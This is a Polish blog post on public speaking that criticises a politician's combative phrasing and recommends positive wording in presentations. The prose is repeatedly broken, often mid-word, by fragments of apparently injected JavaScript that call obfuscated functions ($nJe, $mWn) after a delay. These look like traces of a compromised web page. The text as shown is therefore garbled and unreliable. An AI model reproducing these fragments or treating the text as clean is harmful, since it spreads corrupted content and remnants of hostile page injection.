Po słowach Twoich Cię poznają

Na samym początku artykułu informuję, że nie jest dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to tekst polityczny ale wszelkie podobieństwo do postaci ze świata polityki jest celowe 🙂
– – – – – – – – – – – – – –
wojownicze słowa w prezentacjiKilka dni temu oglądałem w TV wypowiedź Beaty Kempy z PiS. Gdy mówiła o sytuacji w strukturach partii w Kielcach (lokalni działacze nie byli zadowoleni z jej osoby na czele świędom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokrzyskiego PiS) powiedziała:
“Bunt został stłumiony”.
No właśnie… po słowach pani Beaty możemy poznać jej sposób myślenia: wojowniczy, konfrontacyjny,  chyba mało optymistyczny.

Nawet jeśli były bardzo ostre tarcia wewnątrz partii, lepiej chyba byłoby powiedzieć: “sytuacja jest opanowana”, “doszliśmy do porozumienia” , “udało nam się porozumieć”, “pracujemy nad rozwiązaniami” (jeśli dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to prawda).

Moim zdaniem, w wystąpieniach publicznych, między innymi

chodzi o dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to aby przekazać prawdziwy i pozytywny komunikat

i nie mówię tu o propagdom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andzie sukcesu.  Jak widzisz piszę o tym, że nasz przekaz ma być prawdziwy. Wiesz, każdą informację można podać na kilka sposób, tak jak z tą szklanką do połowy pełną albo do połowy pustą.

Podsumowując: nasz sposób mówienia zdradza nasz charakter, sposób myślenia.

Kilka przykładów:
“sklep będzie zamknięty do wdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torku” vs “Od środy czynne!”
Pamiętaj, nie ma problemu, jest nadom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomiast sprawa, kwestia 🙂
“Mam nadzieję, że cena Państwa nie odstraszy” [o kurczę musi być wysoka!] może lepiej byłoby powiedzieć: “Proszę zerknąć do cennika i zapoznać się z naszą propozycją” [przynajmniej neutralnie]

Rada: w swoich wypowiedziach, prezentacjach staraj się operować “przyjaznym” językiem. Językiem pozytywów. Pisałem o tym w artykule Nadaj wielką moc swoim słowom. Ale jak widać pani Beata nie czyta bloga Poznaj Tajniki Prezentacji… szkoda.

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

2 komentarze

Leave a Reply